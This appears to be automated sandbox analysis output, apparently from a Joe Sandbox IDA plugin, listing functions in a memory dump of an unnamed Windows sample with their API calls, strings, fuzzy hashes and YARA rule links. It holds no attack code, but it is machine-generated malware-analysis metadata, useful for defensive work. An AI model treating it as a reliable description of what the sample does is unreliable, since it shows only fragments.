Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: _memmove
String ID: Oa.
API String ID: 4104443479-615990470
Opcode ID: 343b1eefb2fb336e9ccea671aaebcef011653d128328128c2c9425953a080398
Instruction ID: 26e59b3fc1b808b08811eae36e862026a2a9f30784b1ee717c82e61c8edb6c9d
Opcode Fuzzy Hash: 343b1eefb2fb336e9ccea671aaebcef011653d128328128c2c9425953a080398
Instruction Fuzzy Hash: DE517170A10609DFCF29CF68C880AEEB7F5FF48314F54852AE85AD7240EB71A995CB51

Function 002E2AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 002E2AC8
GlobalMemoryStatusEx.KERNEL32(?), ref: 002E2AE1

Strings

@, xrefs: 002E2AD5

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: d2a422e5d03f36fb9bb5af58b8f5a558d3e8a526d213fe7c4a840a51e3b84104
Instruction ID: 8e99903e7c1f7aa5a7a277bdf3f49cfb8f9509557f78c816c55348f71a12d47a
Opcode Fuzzy Hash: d2a422e5d03f36fb9bb5af58b8f5a558d3e8a526d213fe7c4a840a51e3b84104
Instruction Fuzzy Hash: 7F5158724287449BD320AF10D886BABBBECFF85314F42885DF1D9511A1DB3099B9CB26

Function 003399BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 002D506B: __fread_nolock.LIBCMT ref: 002D5089

_wcscmp.LIBCMT ref: 00339AAE
_wcscmp.LIBCMT ref: 00339AC1

Strings

FILE, xrefs: 003399FA

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: daba5d47c24488da980458e049de7505f21d2c86955e392511b8bfb2b9f5c525
Instruction ID: 85dfae6673da479a573eee4b4e1f025f737bd820b7fb5d7cc45a8c6bf0db8684
Opcode Fuzzy Hash: daba5d47c24488da980458e049de7505f21d2c86955e392511b8bfb2b9f5c525
Instruction Fuzzy Hash: A441A971A00619BBDF219AA4DC85FEFB7FDDF49710F01047AF900A7281D6B59E148BA1

Function 0031099E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 003109A9

Strings

Dt9, xrefs: 002DA2B1
Dt9, xrefs: 002DA477

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: ClearVariant
String ID: Dt9$Dt9
API String ID: 1473721057-1564422843
Opcode ID: 33b7220b64789a4d28b2c274df214b9eb27aea5c2e6fb36d28feaef99f43d59f
Instruction ID: 16ccef259a768bd22025643cb751de6e7359c49d6f145a1e5397d0e1e6b28954
Opcode Fuzzy Hash: 33b7220b64789a4d28b2c274df214b9eb27aea5c2e6fb36d28feaef99f43d59f
Instruction Fuzzy Hash: C051F6746283428FC755CF19C480A5ABBF2BB99344F54885EF9858B361D772EC91CF82

Function 00342882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00342892
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 003428C8

Strings

|, xrefs: 00342899

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 7ab4b68fc01a416968c7220ba1f41a0bafeb098ae81b64f520edd5c741df7c99
Instruction ID: c322bea50ea4491e5508eeb69df2f6e98169065104681e27699672f92f7e2e25
Opcode Fuzzy Hash: 7ab4b68fc01a416968c7220ba1f41a0bafeb098ae81b64f520edd5c741df7c99
Instruction Fuzzy Hash: 95311B71814119AFCF019FA1CC85EEEBFB9FF08340F10402AF815A6265EB355966DB60

Function 00356CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00356D86
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00356DC2

Strings

static, xrefs: 00356D22

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: adbdd2beff3a864f95c1377fc6b6abb32c9d55a7e715815e957c0345afb1c62c
Instruction ID: ac8d6f3175fcbb0d7faf859c616846dcdda0e8ee9b2fa6e1884d9afcfb905ee2
Opcode Fuzzy Hash: adbdd2beff3a864f95c1377fc6b6abb32c9d55a7e715815e957c0345afb1c62c
Instruction Fuzzy Hash: 1C318D71210604AEDB129F64CC81EFB77B9FF48721F519619FCA5871A0DA31AC95CB60

Function 00332D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00332E00
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00332E3B

Strings

0, xrefs: 00332DF9

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 2568f284fe44277e6fef92c6e07a393df70c2f6a3022918a5b4ddca034db94f0
Instruction ID: 306ed4dfaadce53a86d55b83bc9655b72214a67cf2601ceb9ef7a5b5c153384a
Opcode Fuzzy Hash: 2568f284fe44277e6fef92c6e07a393df70c2f6a3022918a5b4ddca034db94f0
Instruction Fuzzy Hash: 6631E631600309EBEB26CF59C8C6BAFBBB9FF05350F15042EED95961A0E7709940CB50

Function 00356943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 003569D0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003569DB

Strings

Combobox, xrefs: 0035699D

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: a352fb9ef726e438fca9bb6e6b4507c30c1049f5835321523e53db4cef73a239
Instruction ID: d6c1a84c4e5b9e79cb616dce31cb91b943106fec10f1673cf96bb9cccd6760c6
Opcode Fuzzy Hash: a352fb9ef726e438fca9bb6e6b4507c30c1049f5835321523e53db4cef73a239
Instruction Fuzzy Hash: 6A11E6712002096FEF139E14CC81EEB776EEB893A5F520125FD58972A0D7319C5587A0

Function 00356E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 002D1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 002D1D73
Part of subcall function 002D1D35: GetStockObject.GDI32(00000011), ref: 002D1D87
Part of subcall function 002D1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 002D1D91

GetWindowRect.USER32(00000000,?), ref: 00356EE0
GetSysColor.USER32(00000012), ref: 00356EFA

Strings

static, xrefs: 00356EBD

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: ef614c69cbd401edd635f0adbd17905c9b9998de0e2638fd23f0047c8fd2e611
Instruction ID: 860d60bbf5b5e3042e71d0d051c555df50ab5476f3458428ac865dd5e8188aab
Opcode Fuzzy Hash: ef614c69cbd401edd635f0adbd17905c9b9998de0e2638fd23f0047c8fd2e611
Instruction Fuzzy Hash: 78215972A1020AAFDB05DFA8CD46EEA7BB8FB08315F014629FD55D3260E734E8659B50

Function 00356B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00356C11
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00356C20

Strings

edit, xrefs: 00356BF5

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 3c77760c10fb586d83577b006abccd268d7e18d940f89943dd050d0a3938ad65
Instruction ID: dd68ae8bc91bfdbebbf4a3bd41e59379cafb393de6ea1008549f3010b1a74370
Opcode Fuzzy Hash: 3c77760c10fb586d83577b006abccd268d7e18d940f89943dd050d0a3938ad65
Instruction Fuzzy Hash: 67118B71501208ABEB128E649C42EAB376DEB0436AF914724FD60D71F0C6319C989B60

Function 00332E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00332F11
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00332F30

Strings

0, xrefs: 00332F07

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: ff7b0b7f191115b08668cc72882807c24279c815cb4ab2d29c7b0a8c6daf0da2
Instruction ID: 81600d6d0f757af2a0fd28529b56e44bdf377caa62af36cc23a41b7b1fc64866
Opcode Fuzzy Hash: ff7b0b7f191115b08668cc72882807c24279c815cb4ab2d29c7b0a8c6daf0da2
Instruction Fuzzy Hash: 6F11C471909214ABDB23DB58DC85BAB77BDEB05350F1600B6F854A72B0D7B0EE44C791

Function 003424CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00342520
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00342549

Strings

<local>, xrefs: 00342511

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 4537d0e1316593d5ed24f8a508bc70025e5f2abe2ff5c8b408f6662173058bf7
Instruction ID: c98d84ac8ae928e2b89c1418df1c9e783db427cd40f59c429887a06a8168b59b
Opcode Fuzzy Hash: 4537d0e1316593d5ed24f8a508bc70025e5f2abe2ff5c8b408f6662173058bf7
Instruction Fuzzy Hash: 4111CE70501225BEDB269F528C98EBBFFACEF06351F50816AF9056A140D2B07980DAA0

Function 003480A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0034830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,003480C8,?,00000000,?,?), ref: 00348322

inet_addr.WS2_32(00000000), ref: 003480CB
htons.WS2_32(00000000), ref: 00348108

Strings

255.255.255.255, xrefs: 003480E3

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: bc79b83646cc819d312099a62ca63008f37edf66b104805756b286379ceb2ed1
Instruction ID: df2d46698168b91e9a70c7105b69fd6f2ba43948c75cccc77e0c322ba5a0a671
Opcode Fuzzy Hash: bc79b83646cc819d312099a62ca63008f37edf66b104805756b286379ceb2ed1
Instruction Fuzzy Hash: DE11E134200319ABDB21AF64CC46FADB3B8FF04320F108527EA119B291DB72A811C795

Function 002E0A8D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,002D3C26,003962F8,?,?,?), ref: 002E0ACE

Part of subcall function 002D7D2C: _memmove.LIBCMT ref: 002D7D66

_wcscat.LIBCMT ref: 003150E1

Strings

c9, xrefs: 002E0B0E

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: FullNamePath_memmove_wcscat
String ID: c9
API String ID: 257928180-4125369584
Opcode ID: 3457b06ca21c8af19df7010a083c4512afdf21b22d6f1082b790e9f73019b147
Instruction ID: da98a8a8b0d6e205001345a0b29323717f014c3a9d26006b25b560eb6f2bfbb2
Opcode Fuzzy Hash: 3457b06ca21c8af19df7010a083c4512afdf21b22d6f1082b790e9f73019b147
Instruction Fuzzy Hash: C211A935A642089BCB02EBA4CC42DDD73B9FF0C344B4045A6B94CD7251EBB49BD54F11

Function 003292E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 002D7F41: _memmove.LIBCMT ref: 002D7F82

Part of subcall function 0032B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0032B0E7

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00329355

Strings

ListBox, xrefs: 0032931F
ComboBox, xrefs: 003292F4

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 1af037d35f60a79bd9cdc1b24dbbe47b32236291b64c06fedb0b1047c51e9e63
Instruction ID: ff073a319177180c4dee5fd3aedca0451f756dabd1fbd7945df8782609481513
Opcode Fuzzy Hash: 1af037d35f60a79bd9cdc1b24dbbe47b32236291b64c06fedb0b1047c51e9e63
Instruction Fuzzy Hash: D301F175A01224ABCB06FBA0CC91AFE73ADBF06320F14061AF932573D1EB3158188B50

Function 003291DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 002D7F41: _memmove.LIBCMT ref: 002D7F82

Part of subcall function 0032B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0032B0E7

SendMessageW.USER32(?,00000180,00000000,?), ref: 0032924D

Strings

ListBox, xrefs: 00329217
ComboBox, xrefs: 003291EC

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 9ceb8c9e13597db4d3ad1760c79194e68a5f995a60b615d535657bf83f4fd5b6
Instruction ID: 167ecbb272e059479a3c2d99344fdb9e929218b06b669e7391bdfddda57155df
Opcode Fuzzy Hash: 9ceb8c9e13597db4d3ad1760c79194e68a5f995a60b615d535657bf83f4fd5b6
Instruction Fuzzy Hash: 8E018471A41229BBCB1AEBA0D992FFF73AC9F05300F14006AB91267691EB155E1C9661

Function 00329264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 002D7F41: _memmove.LIBCMT ref: 002D7F82

Part of subcall function 0032B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0032B0E7

SendMessageW.USER32(?,00000182,?,00000000), ref: 003292D0

Strings

ListBox, xrefs: 0032929C
ComboBox, xrefs: 00329271

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 471b8c83a94d446e8d552368dd72251ac21f8c005fd35944a28888f048a1de0c
Instruction ID: c5096214b7126630da0d025acebd9e23ca447f666ad9702632690882f7ec2e3c
